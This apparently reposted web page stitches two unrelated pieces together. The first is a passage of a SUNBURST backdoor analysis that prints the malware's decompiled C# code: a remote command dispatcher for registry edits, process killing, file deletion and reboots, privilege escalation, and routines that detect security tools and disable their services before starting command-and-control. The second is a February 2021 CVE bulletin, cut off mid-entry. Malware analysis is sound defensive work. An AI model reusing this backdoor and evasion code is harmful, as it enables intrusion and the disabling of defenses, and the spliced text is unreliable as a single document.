The “ExecuteEngine” is a core function that uses the “job” variable to carry out certain tasks for the adversary. This function has the ability to run tasks that could consist of command line arguments, alter the registry (to maintain persistence, etc.), collect a detailed description of the target platform, kill tasks, delete files, add files, or even execute a secondary payload:
–Begin ExecuteEngine Function–
private int ExecuteEngine(
OrionImprovementBusinessLayer.HttpHelper.JobEngine job,
string cl,
out string result)
{
result = (string) null;
int num = 0;
string[] args = OrionImprovementBusinessLayer.Job.SplitString(cl);
try
{
if (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.ReadRegistryValue || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.SetRegistryValue || (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteRegistryValue || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetRegistrySubKeyAndValueNames))
num = OrionImprovementBusinessLayer.HttpHelper.AddRegistryExecutionEngine(job, args, out result);
switch (job)
{
case OrionImprovementBusinessLayer.HttpHelper.JobEngine.SetTime:
int delay;
OrionImprovementBusinessLayer.Job.SetTime(args, out delay);
this.delay = delay;
break;
case OrionImprovementBusinessLayer.HttpHelper.JobEngine.CollectSystemDescription:
OrionImprovementBusinessLayer.Job.CollectSystemDescription(this.proxy.ToString(), out result);
break;
case OrionImprovementBusinessLayer.HttpHelper.JobEngine.UploadSystemDescription:
OrionImprovementBusinessLayer.Job.UploadSystemDescription(args, out result, this.proxy.GetWebProxy());
break;
case OrionImprovementBusinessLayer.HttpHelper.JobEngine.RunTask:
num = OrionImprovementBusinessLayer.Job.RunTask(args, cl, out result);
break;
case OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetProcessByDescription:
OrionImprovementBusinessLayer.Job.GetProcessByDescription(args, out result);
break;
case OrionImprovementBusinessLayer.HttpHelper.JobEngine.KillTask:
OrionImprovementBusinessLayer.Job.KillTask(args);
break;
}
return job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.WriteFile || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.FileExists || (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteFile || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileHash) || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileSystemEntries ? OrionImprovementBusinessLayer.HttpHelper.AddFileExecutionEngine(job, args, out result) : num;
}
catch (Exception ex)
{
if (!string.IsNullOrEmpty(result))
result += “n”;
result += ex.Message;
return ex.HResult;
}
–End ExecuteEngine function–
**TERMINATE PROCESSES**
public static void KillTask(string[] args) =>
Process.GetProcessById(int.Parse(args[0])).Kill();
**DELETE FILE**
public static void DeleteFile(string[] args) => System.IO.File.Delete(Environment.ExpandEnvironmentVariables(args[0]));
**COMPUTE FILE HASHES**
public static int GetFileHash(string[] args, out string result)
{
result = (string) null;
string path = Environment.ExpandEnvironmentVariables(args[0]);
using (MD5 md5 = MD5.Create())
{
using (FileStream fileStream = System.IO.File.OpenRead(path))
{
byte[] hash = md5.ComputeHash((Stream) fileStream);
if (args.Length > 1)
return !(OrionImprovementBusinessLayer.ByteArrayToHexString(hash).ToLower() == args[1].ToLower()) ? 1 : 0;
result = OrionImprovementBusinessLayer.ByteArrayToHexString(hash);
}
}
return 0;
}
**REBOOT SYSTEM**
public static bool RebootComputer()
{
bool flag = false;
try
{
bool previousState = false;
string privilege = OrionImprovementBusinessLayer.ZipHelper.Unzip(ph2eifo3n5utg1j8d94qrvbmk0sal76c);
if (!OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, true, out previousState))
return flag;
flag = OrionImprovementBusinessLayer.NativeMethods.InitiateSystemShutdownEx((string) null, (string) null, 0U, true, true, 2147745794U);
OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, previousState, out previousState);
return flag;
}
catch (Exception ex)
{
return flag;
}
}
–End additional functions Function–
**ADJUST PROCESS PRIVILEGES**
The SetProcessPrivilege function is used to adjust privileges for a target process on the victim system. For example, a process may need increased system level privileges to accomplish its designed task.
–Begin SetProcessPrivilege Function–
public static bool SetProcessPrivilege(
string privilege,
bool newState,
out bool previousState)
{
bool flag = false;
previousState = false;
try
{
IntPtr zero = IntPtr.Zero;
OrionImprovementBusinessLayer.NativeMethods.LUID Luid = new OrionImprovementBusinessLayer.NativeMethods.LUID();
Luid.LowPart = 0U;
Luid.HighPart = 0U;
if (!OrionImprovementBusinessLayer.NativeMethods.OpenProcessToken(OrionImprovementBusinessLayer.NativeMethods.GetCurrentProcess(), TokenAccessLevels.Query | TokenAccessLevels.AdjustPrivileges, ref zero))
return false;
if (!OrionImprovementBusinessLayer.NativeMethods.LookupPrivilegeValue((string) null, privilege, ref Luid))
{
OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero);
return false;
}
OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE NewState = new OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE();
OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE PreviousState = new OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE();
NewState.PrivilegeCount = 1U;
NewState.Privilege.Luid = Luid;
NewState.Privilege.Attributes = newState ? 2U : 0U;
uint ReturnLength = 0;
OrionImprovementBusinessLayer.NativeMethods.AdjustTokenPrivileges(zero, false, ref NewState, (uint) Marshal.SizeOf((object) PreviousState), ref PreviousState, ref ReturnLength);
previousState = (PreviousState.Privilege.Attributes & 2U) > 0U;
flag = true;
OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero);
return flag;
}
catch (Exception ex)
{
return flag;
}
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct LUID
{
public uint LowPart;
public uint HighPart;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct LUID_AND_ATTRIBUTES
{
public OrionImprovementBusinessLayer.NativeMethods.LUID Luid;
public uint Attributes;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct TOKEN_PRIVILEGE
{
public uint PrivilegeCount;
public OrionImprovementBusinessLayer.NativeMethods.LUID_AND_ATTRIBUTES Privilege;
}
}
–End SetProcessPrivilege Function–
**BLOCK LIST CHECKING FUNCTIONS**
The Update function is critical to starting the SUNBURST C2 functionality. Early in its execution, the Update function calls the UpdateNotification() function. If that returns a “False”, indicating one of the hard-coded block list processes is running, the SUNBURST malware will not initiate its C2 session. The malicious class “OrionImprovementBusinessLayer”, containing the SUNBURST module, will effectively be disabled. However, the parent SolarWinds process running the malicious DLL 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 will not be interrupted.
–Begin Update Function–
private static void Update()
{
bool flag1 = false;
OrionImprovementBusinessLayer.CryptoHelper cryptoHelper = new OrionImprovementBusinessLayer.CryptoHelper(OrionImprovementBusinessLayer.userId, OrionImprovementBusinessLayer.domain4);
OrionImprovementBusinessLayer.HttpHelper http = (OrionImprovementBusinessLayer.HttpHelper) null;
Thread thread = (Thread) null;
bool last = true;
OrionImprovementBusinessLayer.AddressFamilyEx addressFamilyEx = OrionImprovementBusinessLayer.AddressFamilyEx.Unknown;
int num1 = 0;
bool flag2 = true;
OrionImprovementBusinessLayer.DnsRecords rec = new OrionImprovementBusinessLayer.DnsRecords();
Random random = new Random();
int num2 = 0;
if (!OrionImprovementBusinessLayer.UpdateNotification())
return;
OrionImprovementBusinessLayer.svcListModified2 = false;
for (int index = 1; index <= 3 && !flag1; ++index)
{
OrionImprovementBusinessLayer.DelayMin(rec.A, rec.A);
if (!OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true))
{
if (OrionImprovementBusinessLayer.svcListModified1)
flag2 = true;
num1 = OrionImprovementBusinessLayer.svcListModified2 ? num1 + 1 : 0;
string hostName;
switch (OrionImprovementBusinessLayer.status)
{
case OrionImprovementBusinessLayer.ReportStatus.New:
hostName = addressFamilyEx == OrionImprovementBusinessLayer.AddressFamilyEx.Error ? cryptoHelper.GetCurrentString() : cryptoHelper.GetPreviousString(out last);
break;
case OrionImprovementBusinessLayer.ReportStatus.Append:
hostName = flag2 ? cryptoHelper.GetNextStringEx(rec.dnssec) : cryptoHelper.GetNextString(rec.dnssec);
break;
default:
goto label_27;
}
–End Update Function–
The UpdateNotification() function will return a “False” if any process on the hard coded blocklist is running on the target system. It utilizes the TrackProcess function detailed below. It call the TrackProcesses function.
–Begin UpdateNotification Function–
private static bool UpdateNotification()
{
int num = 3;
while (num– > 0)
{
OrionImprovementBusinessLayer.DelayMin(0, 0);
if (OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true))
return false;
if (OrionImprovementBusinessLayer.DnsHelper.CheckServerConnection(OrionImprovementBusinessLayer.apiHost))
return true;
}
return false;
}
–End UpdateNotification Function–
The “TrackProcesses” function queries a list of running processes on the target system and then passes the process names to the “SearchAssemblies” function, which hashes their process names and compares the result hashes to the hard-coded process hash list stored in the list “assemblyTimeStamps.” If any of the target processes are running, the function will return True. It also searches for certain services and attempts to disable them.
–Begin TrackProcesses Function–
public static bool TrackProcesses(bool full)
{
Process[] processes = Process.GetProcesses();
if (OrionImprovementBusinessLayer.ProcessTracker.SearchAssemblies(processes))
return true;
bool flag = OrionImprovementBusinessLayer.ProcessTracker.SearchServices(processes);
return !flag & full ? OrionImprovementBusinessLayer.ProcessTracker.SearchConfigurations() : flag;
}
–End TrackProcesses Function–
The “SearchAssemblies” function called by TrackProcesses, is used to enumerate running processes to determine if any of the hashed processes, included within the process blocklist are currently running on the target system.
–Begin SearchAssemblies Function—
private static bool SearchAssemblies(Process[] processes)
{
for (int index = 0; index < processes.Length; ++index)
{
ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower());
if (Array.IndexOf<ulong>(OrionImprovementBusinessLayer.assemblyTimeStamps, hash) != -1)
return true;
}
return false;
}
–End SearchAssemblies Function–
The SearchServices” function, called by TrackProcesses, searches running services to determine whether or not they are running any of the hard-coded block list target process hashes. It attempts to disable these services.
–Begin SearchServices Function–
private static bool SearchServices(Process[] processes)
{
for (int index = 0; index < processes.Length; ++index)
{
ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower());
foreach (OrionImprovementBusinessLayer.ServiceConfiguration svc in OrionImprovementBusinessLayer.svcList)
{
if (Array.IndexOf<ulong>(svc.timeStamps, hash) != -1)
{
object obj = OrionImprovementBusinessLayer.ProcessTracker._lock;
bool flag = false;
try
{
Monitor.Enter(obj, ref flag);
if (!svc.running)
{
OrionImprovementBusinessLayer.svcListModified1 = true;
OrionImprovementBusinessLayer.svcListModified2 = true;
svc.running = true;
}
if (!svc.disabled)
{
if (!svc.stopped)
{
if (svc.Svc.Length != 0)
{
OrionImprovementBusinessLayer.DelayMin(0, 0);
OrionImprovementBusinessLayer.ProcessTracker.SetManualMode(svc.Svc);
svc.disabled = true;
svc.stopped = true;
}
}
}
}
finally
{
if (flag)
Monitor.Exit(obj);
}
–End SearchServices Function–
Screenshots
Figure 1 – The modified module with a new class function named “OrionImprovementBusinessLayer.”
Figure 2 – The code snippet contains the subdomains and other strings used to construct the C2 domains.
by Scott Muniz | Feb 8, 2021 | Security, Technology
This article is contributed. See the original author and article here.
| huawei — multiple_products |
There is an information leak vulnerability in eCNS280_TD versions V100R005C00 and V100R005C10. A command does not have timeout exit mechanism. Temporary file contains sensitive information. This allows attackers to obtain information by inter-process access that requires other methods. |
2021-02-06 |
not yet calculated |
CVE-2021-22300
CONFIRM |
allen-bradley — flex_io_1794-aent/b
|
An exploitable denial of service vulnerability exists in the ENIP Request Path Network Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability. |
2021-02-04 |
not yet calculated |
CVE-2020-6088
MISC |
angular — angular
|
angular-expressions is “angular’s nicest part extracted as a standalone module for the browser and node”. In angular-expressions before version 1.1.2 there is a vulnerability which allows Remote Code Execution if you call “expressions.compile(userControlledInput)” where “userControlledInput” is text that comes from user input. The security of the package could be bypassed by using a more complex payload, using a “.constructor.constructor” technique. In terms of impact: If running angular-expressions in the browser, an attacker could run any browser script when the application code calls expressions.compile(userControlledInput). If running angular-expressions on the server, an attacker could run any Javascript expression, thus gaining Remote Code Execution. This is fixed in version 1.1.2 of angular-expressions A temporary workaround might be either to disable user-controlled input that will be fed into angular-expressions in your application or allow only following characters in the userControlledInput. |
2021-02-01 |
not yet calculated |
CVE-2021-21277
MISC
MISC
CONFIRM
MISC |
asuswrt — asus_rt-ax3000_firmware
|
Denial of service in ASUSWRT ASUS RT-AX3000 firmware versions 3.0.0.4.384_10177 and earlier versions allows an attacker to disrupt the use of device setup services via continuous login error. |
2021-02-05 |
not yet calculated |
CVE-2021-3229
MISC
MISC
MISC |
bitcoin — core
|
Bitcoin Core before 0.19.0 might allow remote attackers to execute arbitrary code when another application unsafely passes the -platformpluginpath argument to the bitcoin-qt program, as demonstrated by an x-scheme-handler/bitcoin handler for a .desktop file or a web browser. NOTE: the discoverer states “I believe that this vulnerability cannot actually be exploited.” |
2021-02-04 |
not yet calculated |
CVE-2021-3401
MISC
MISC |
blaze — blaze
|
Http4s (http4s-blaze-server) is a minimal, idiomatic Scala interface for HTTP services. Http4s before versions 0.21.17, 0.22.0-M2, and 1.0.0-M14 have a vulnerability which can lead to a denial-of-service. Blaze-core, a library underlying http4s-blaze-server, accepts connections unboundedly on its selector pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections. http4s provides a general “MaxActiveRequests” middleware mechanism for limiting open connections, but it is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open. In 0.21.17, 0.22.0-M2, and 1.0.0-M14, a new “maxConnections” property, with a default value of 1024, has been added to the `BlazeServerBuilder`. Setting the value to a negative number restores unbounded behavior, but is strongly disrecommended. The NIO2 backend does not respect `maxConnections`. Its use is now deprecated in http4s-0.21, and the option is removed altogether starting in http4s-0.22. There are several possible workarounds described in the refrenced GitHub Advisory GHSA-xhv5-w9c5-2r2w. |
2021-02-02 |
not yet calculated |
CVE-2021-21294
MISC
MISC
CONFIRM |
blaze — blaze
|
blaze is a Scala library for building asynchronous pipelines, with a focus on network IO. All servers running blaze-core before version 0.14.15 are affected by a vulnerability in which unbounded connection acceptance leads to file handle exhaustion. Blaze, accepts connections unconditionally on a dedicated thread pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections. The vast majority of affected users are using it as part of http4s-blaze-server <= 0.21.16. http4s provides a mechanism for limiting open connections, but is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open. The issue is fixed in version 0.14.15 for “NIO1SocketServerGroup”. A “maxConnections” parameter is added, with a default value of 512. Concurrent connections beyond this limit are rejected. To run unbounded, which is not recommended, set a negative number. The “NIO2SocketServerGroup” has no such setting and is now deprecated. There are several possible workarounds described in the refrenced GitHub Advisory GHSA-xmw9-q7x9-j5qc. |
2021-02-02 |
not yet calculated |
CVE-2021-21293
MISC
CONFIRM
MISC |
cisco — 8000_series_routers
|
A vulnerability in a CLI command of Cisco IOS XR Software for the Cisco 8000 Series Routers and Network Convergence System 540 Series Routers running NCS540L software images could allow an authenticated, local attacker to elevate their privilege to root. To exploit this vulnerability, an attacker would need to have a valid account on an affected device. The vulnerability is due to insufficient validation of command line arguments. An attacker could exploit this vulnerability by authenticating to the device and entering a crafted command at the prompt. A successful exploit could allow an attacker with low-level privileges to escalate their privilege level to root. |
2021-02-04 |
not yet calculated |
CVE-2021-1370
CISCO |
cisco — ios_xr_software
|
A vulnerability in the Local Packet Transport Services (LPTS) programming of the SNMP with the management plane protection feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to allow connections despite the management plane protection that is configured to deny access to the SNMP server of an affected device. This vulnerability is due to incorrect LPTS programming when using SNMP with management plane protection. An attacker could exploit this vulnerability by connecting to an affected device using SNMP. A successful exploit could allow the attacker to connect to the device on the configured SNMP ports. Valid credentials are required to execute any of the SNMP requests. |
2021-02-04 |
not yet calculated |
CVE-2021-1243
CISCO |
cisco — ios_xr_software
|
A vulnerability in the IPv6 protocol handling of the management interfaces of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause an IPv6 flood on the management interface network of an affected device. The vulnerability exists because the software incorrectly forwards IPv6 packets that have an IPv6 node-local multicast group address destination and are received on the management interfaces. An attacker could exploit this vulnerability by connecting to the same network as the management interfaces and injecting IPv6 packets that have an IPv6 node-local multicast group address destination. A successful exploit could allow the attacker to cause an IPv6 flood on the corresponding network. Depending on the number of Cisco IOS XR Software nodes on that network segment, exploitation could cause excessive network traffic, resulting in network degradation or a denial of service (DoS) condition. |
2021-02-04 |
not yet calculated |
CVE-2021-1268
CISCO |
cisco — ios_xr_software
|
Multiple vulnerabilities in the ingress packet processing function of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. |
2021-02-04 |
not yet calculated |
CVE-2021-1288
CISCO |
cisco — ios_xr_software
|
Multiple vulnerabilities in the ingress packet processing function of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. |
2021-02-04 |
not yet calculated |
CVE-2021-1313
CISCO |
cisco — ios_xr_software
|
A vulnerability in the IPv6 traffic processing of Cisco IOS XR Software and Cisco NX-OS Software for certain Cisco devices could allow an unauthenticated, remote attacker to bypass an IPv6 access control list (ACL) that is configured for an interface of an affected device. The vulnerability is due to improper processing of IPv6 traffic that is sent through an affected device. An attacker could exploit this vulnerability by sending crafted IPv6 packets that traverse the affected device. A successful exploit could allow the attacker to access resources that would typically be protected by the interface ACL. |
2021-02-04 |
not yet calculated |
CVE-2021-1389
CISCO |
cisco — ios_xr_software
|
A vulnerability in the CLI parser of Cisco IOS XR Software could allow an authenticated, local attacker to view more information than their privileges allow. The vulnerability is due to insufficient application of restrictions during the execution of a specific command. An attacker could exploit this vulnerability by using a specific command at the command line. A successful exploit could allow the attacker to obtain sensitive information within the configuration that otherwise might not have been accessible beyond the privileges of the invoking user. |
2021-02-04 |
not yet calculated |
CVE-2021-1128
CISCO |
cisco — managed_services_accelerator
|
A vulnerability in the REST API of Cisco Managed Services Accelerator (MSX) could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to the way that the affected software logs certain API requests. An attacker could exploit this vulnerability by sending a flood of crafted API requests to an affected device. A successful exploit could allow the attacker to cause a DoS condition on the affected device. |
2021-02-04 |
not yet calculated |
CVE-2021-1266
CISCO |
| cisco — multiple_small_business_routers |
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to conduct directory traversal attacks and overwrite certain files that should be restricted on an affected system. These vulnerabilities are due to insufficient input validation. An attacker could exploit these vulnerabilities by using the web-based management interface to upload a file to location on an affected device that they should not have access to. A successful exploit could allow the attacker to overwrite files on the file system of the affected device. |
2021-02-04 |
not yet calculated |
CVE-2021-1297
CISCO |
| cisco — multiple_small_business_routers |
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. |
2021-02-04 |
not yet calculated |
CVE-2021-1295
CISCO |
| cisco — multiple_small_business_routers |
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. |
2021-02-04 |
not yet calculated |
CVE-2021-1291
CISCO |
| cisco — multiple_small_business_routers |
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. |
2021-02-04 |
not yet calculated |
CVE-2021-1290
CISCO |
cisco — multiple_small_business_routers
|
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. |
2021-02-04 |
not yet calculated |
CVE-2021-1315
CISCO |
cisco — multiple_small_business_routers
|
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. |
2021-02-04 |
not yet calculated |
CVE-2021-1314
CISCO |
cisco — multiple_small_business_routers
|
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. |
2021-02-04 |
not yet calculated |
CVE-2021-1316
CISCO |
cisco — multiple_small_business_routers
|
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to conduct directory traversal attacks and overwrite certain files that should be restricted on an affected system. These vulnerabilities are due to insufficient input validation. An attacker could exploit these vulnerabilities by using the web-based management interface to upload a file to location on an affected device that they should not have access to. A successful exploit could allow the attacker to overwrite files on the file system of the affected device. |
2021-02-04 |
not yet calculated |
CVE-2021-1296
CISCO |
cisco — multiple_small_business_routers
|
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. |
2021-02-04 |
not yet calculated |
CVE-2021-1294
CISCO |
cisco — multiple_small_business_routers
|
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. |
2021-02-04 |
not yet calculated |
CVE-2021-1292
CISCO |
cisco — multiple_small_business_routers
|
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. |
2021-02-04 |
not yet calculated |
CVE-2021-1289
CISCO |
cisco — multiple_small_business_routers
|
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. |
2021-02-04 |
not yet calculated |
CVE-2021-1317
CISCO |
cisco — multiple_small_business_routers
|
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. |
2021-02-04 |
not yet calculated |
CVE-2021-1318
CISCO |
cisco — multiple_small_business_routers
|
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. |
2021-02-04 |
not yet calculated |
CVE-2021-1293
CISCO |
cisco — network_convergence_system_540_series_routers
|
Multiple vulnerabilities in Cisco Network Convergence System (NCS) 540 Series Routers, only when running Cisco IOS XR NCS540L software images, and Cisco IOS XR Software for the Cisco 8000 Series Routers could allow an authenticated, local attacker to execute unsigned code during the boot process on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. |
2021-02-04 |
not yet calculated |
CVE-2021-1244
CISCO |
cisco — network_convergence_system_540_series_routers
|
Multiple vulnerabilities in Cisco Network Convergence System (NCS) 540 Series Routers, only when running Cisco IOS XR NCS540L software images, and Cisco IOS XR Software for the Cisco 8000 Series Routers could allow an authenticated, local attacker to execute unsigned code during the boot process on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. |
2021-02-04 |
not yet calculated |
CVE-2021-1136
CISCO |
cisco — unified_computing_system
|
A vulnerability in the certificate registration process of Cisco Unified Computing System (UCS) Central Software could allow an authenticated, adjacent attacker to register a rogue Cisco Unified Computing System Manager (UCSM). This vulnerability is due to improper certificate validation. An attacker could exploit this vulnerability by sending a crafted HTTP request to the registration API. A successful exploit could allow the attacker to register a rogue Cisco UCSM and gain access to Cisco UCS Central Software data and Cisco UCSM inventory data. |
2021-02-04 |
not yet calculated |
CVE-2021-1354
CISCO |
cisco — webex_meetings_and_webex_meetings_server_software
|
A vulnerability in the user interface of Cisco Webex Meetings and Cisco Webex Meetings Server Software could allow an authenticated, remote attacker to inject a hyperlink into a meeting invitation email. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by entering a URL into a field in the user interface. A successful exploit could allow the attacker to generate a Webex Meetings invitation email that contains a link to a destination of their choosing. Because this email is sent from a trusted source, the recipient may be more likely to click the link. |
2021-02-04 |
not yet calculated |
CVE-2021-1221
CISCO |
| clustered_data — ontap |
Clustered Data ONTAP versions prior to 9.3P20 and 9.5P15 are susceptible to a vulnerability which could allow unauthorized tenant users to discover the existence of data on other Storage Virtual Machines (SVMs). |
2021-02-03 |
not yet calculated |
CVE-2020-8588
CONFIRM |
clustered_data — ontap
|
Clustered Data ONTAP versions prior to 9.3P20 and 9.5P15 are susceptible to a vulnerability which could allow unauthorized tenant users to discover the names of other Storage Virtual Machines (SVMs) and filenames on those SVMs. |
2021-02-03 |
not yet calculated |
CVE-2020-8589
CONFIRM |
com.squareup:connet — com.squareup:connet
|
This affects all versions of package com.squareup:connect. The method prepareDownloadFilecreates creates a temporary file with the permissions bits of -rw-r–r– on unix-like systems. On unix-like systems, the system temporary directory is shared between users. As such, the contents of the file downloaded by downloadFileFromResponse will be visible to all other users on the local system. A workaround fix for this issue is to set the system property java.io.tmpdir to a safe directory as remediation. Note: This version of the SDK is end of life and no longer maintained, please upgrade to the latest version. |
2021-02-03 |
not yet calculated |
CVE-2021-23331
CONFIRM
CONFIRM |
| docker — docker |
In Docker before versions 9.03.15, 20.10.3 there is a vulnerability involving the –userns-remap option in which access to remapped root allows privilege escalation to real root. When using “–userns-remap”, if the root user in the remapped namespace has access to the host filesystem they can modify files under “/var/lib/docker/<remapping>” that cause writing files with extended privileges. Versions 20.10.3 and 19.03.15 contain patches that prevent privilege escalation from remapped user. |
2021-02-02 |
not yet calculated |
CVE-2021-21284
MISC
MISC
MISC
MISC
CONFIRM |
| docker — docker |
In Docker before versions 9.03.15, 20.10.3 there is a vulnerability in which pulling an intentionally malformed Docker image manifest crashes the dockerd daemon. Versions 20.10.3 and 19.03.15 contain patches that prevent the daemon from crashing. |
2021-02-02 |
not yet calculated |
CVE-2021-21285
MISC
MISC
MISC
MISC
CONFIRM |
eclipse — californium
|
